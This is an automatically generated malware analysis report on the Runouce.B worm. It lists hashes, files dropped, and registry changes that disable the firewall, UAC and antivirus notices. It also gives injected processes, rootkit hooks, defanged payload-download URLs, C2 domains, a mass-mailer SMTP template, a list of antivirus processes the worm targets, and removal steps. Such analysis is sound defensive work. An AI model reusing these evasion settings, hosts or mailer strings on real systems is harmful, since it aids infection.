Win32.Runouce.Bmm_d1a9eb22ca
HEUR:Virus.Win32.Generic (Kaspersky), Win32.Runouce.B@mm (B) (Emsisoft), Win32.Runouce.B@mm (AdAware), Virus.Win32.Sality.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: d1a9eb22ca68f5fdb8e4321176bfc55b
SHA1: 358ba3fa89e2158a7d3f3c28e89f1f7622dec259
SHA256: f6a9828a2c33a460564296690e14c058c4ff904064095d7d037cd37ed1a8a595
SSDeep: 6144:eBODRHr8GayPVxR3SMoKSRbBigwmL5GWJdV6bg:eBUHQS7R3loztBrG47
Size: 318460 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-02-09 16:07:45
Analyzed on: Windows7 SP1 32-bit
Summary:
Worm. A program that primarily replicates over networks or removable drives.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
No processes have been created.
The Worm injects its code into the following process(es):
%original file name%.exe:1780
%original file name%.exe:1908
taskhost.exe:1940
Dwm.exe:2008
Explorer.EXE:2024
conhost.exe:2520
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1780 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\system.ini (70 bytes)
C:\chkc.exe (130 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\reader_sl.exe (1312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (741 bytes)
C:\autorun.inf (279 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (784 bytes)
The Worm deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (0 bytes)
The process %original file name%.exe:1908 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (3288 bytes)
Registry activity
The process %original file name%.exe:1780 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Aas]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
The firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process %original file name%.exe:1908 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
To run itself automatically each time Windows is booted, the Worm adds the following link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 516a83a3c69a76442df26b1bb7f71a4b | c:\chkc.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
Company Name: Microsoft Corporation
Product Name: OLEViewer
Product Version: 2.1
Legal Copyright: Copyright (c) 1993-96 Microsoft Corporation. All Rights Reserved.
Legal Trademarks: By Charlie Kindel, Michael Nelson, and Michael Antonio
Original Filename: oleview.EXE
Internal Name: OLEViewer
File Version: 2.10.050
File Description: OLEViewer Version 2.1
Comments: OLE/COM Object Viewer 2.1
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 110592 | 110592 | 4.19064 | 8c726ddd40d62c42b05a31986c2fdc4f |
| .data | 114688 | 2424 | 2048 | 2.90468 | 2590b7d371c8e57df2df83a3770a3762 |
| .rsrc | 118784 | 45428 | 45568 | 2.90377 | 1cc2f56f86438219852cdf89a0340dc3 |
| .reloc | 167936 | 155652 | 156156 | 5.439 | 4e20c20e4f900778903b10cb7e5aac26 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| meggay.com | |
| regexy.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
The Worm connects to the servers at the following location(s):
%original file name%.exe_1908_rwx_00200000_00008000:
%original file name%.exe_1908_rwx_00210000_00002000:
%original file name%.exe_1780:
%original file name%.exe_1908_rwx_00220000_00001000:
Bv%original file name%.exeM_1908_
%original file name%.exe_1908_rwx_01001000_00001000:
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'
%original file name%.exe_1908_rwx_01046000_0000A000:
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
fbibiz.com
olmbra.com
meggay.com
regexy.com
inreos.com
NICK yhzlxkjy
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
%original file name%.exe_1780_rwx_01001000_00001000:
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'
taskhost.exe_1940_rwx_00120000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
%original file name%.exe_1780_rwx_0102B000_00019000:
(pL%C#
$.RB(t
p.FdZ
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
%original file name%.exe
.reloc
c:\%original file name%.exe
hXXp://acemoglusucuklari.com.tr/images/logo.gif
hXXp://a-bring.com/sanybook/logo.gif
hXXp://tn69abi.com/images/logof.gif
hXXp://gim8.pl/logo.gif
hXXp://aclassalerts.com/images/logo.gif
hXXp://VVV.3pindia.in/images/logo.gif
hXXp://aci.gratix.com.br/logo.gif
hXXp://1s2qvh91x.site.aplus.net/images/logo.gif
hXXp://abb.ind.in/logo.gif
hXXp://VVV.akpartisariveliler.com/images/img.gif
4j14/logo.gif
.info/J
home.gifI888
.text
KERNEL32.dll
h.rata
Bkrnl.exe?
= =$=(=,=
322%2`.50728)
.klkjw:9fqwi
FamXf39.sys
.pBTa8
%s:*:
Bg.laXV
&?%x=
GUrlA'
Web%w|nc
HTTP)
2GUARDCMD.
.ENHCDM
PL/KPCKwWEB
MM.PFW.
.bssf
J:CRT
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegCloseKey
SHFileOperationA
%original file name%.exe_1780_rwx_01048000_00001000:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
%original file name%.exe_1780_rwx_0104E000_00001000:
%DgO$w
%original file name%.exe_1780_rwx_011B0000_0108E000:
c:\windows
hXXp://acemoglusucuklari.com.tr/images/logo.gif
hXXp://a-bring.com/sanybook/logo.gif
hXXp://tn69abi.com/images/logof.gif
hXXp://gim8.pl/logo.gif
hXXp://aclassalerts.com/images/logo.gif
hXXp://VVV.3pindia.in/images/logo.gif
hXXp://aci.gratix.com.br/logo.gif
hXXp://1s2qvh91x.site.aplus.net/images/logo.gif
hXXp://abb.ind.in/logo.gif
hXXp://VVV.akpartisariveliler.com/images/img.gif
C:\Windows\system32\drivers\jpppn.sys
4239484882
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
.text
KERNEL32.dll
USER32.dll
h.rdata
H.data
ntoskrnl.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
ipfltdrv.sys
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\amsint32
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
A2CMD.
ASHWEBSV.
AVGCC.AVGCHSVX.
DRWEB
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBSCANX.
.adata
M_%d_
%c%d_%d
?456789:;<=
!"#$%&'()* ,-./0123
GetProcessHeap
GetWindowsDirectoryA
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
&3&3&3&389
.rdata
.data
Bkrnl.exe?
= =$=(=,=
322%2`.50728)
.klkjw:9fqwi
FamXf39.sys
.pBTa8
%s:*:
Bg.laXV
&?%x=
GUrlA'
Web%w|nc
HTTP)
2GUARDCMD.
.ENHCDM
PL/KPCKwWEB
MM.PFW.
.bssf
J:CRT
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
WS2_32.dll
%original file name%.exe_1780_rwx_02870000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
%original file name%.exe_1780_rwx_028C0000_00001000:
Bv%original file name%.exeM_1780_
taskhost.exe_1940_rwx_00370000_00001000:
Bvtaskhost.exeM_1940_
Dwm.exe_2008_rwx_00090000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
Dwm.exe_2008_rwx_001D0000_00001000:
Bvdwm.exeM_2008_
Explorer.EXE_2024_rwx_01EE0000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
Explorer.EXE_2024_rwx_02D60000_00001000:
Bvexplorer.exeM_2024_
Explorer.EXE_2024_rwx_03A10000_00001000:
C:\Windows\system32\runouce.exe
conhost.exe_2520_rwx_001B0000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
conhost.exe_2520_rwx_001C0000_00001000:
Bvconhost.exeM_2520_
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
C:\Windows\system.ini (70 bytes)
C:\chkc.exe (130 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\reader_sl.exe (1312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (741 bytes)
C:\autorun.inf (279 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (784 bytes)
C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (3288 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.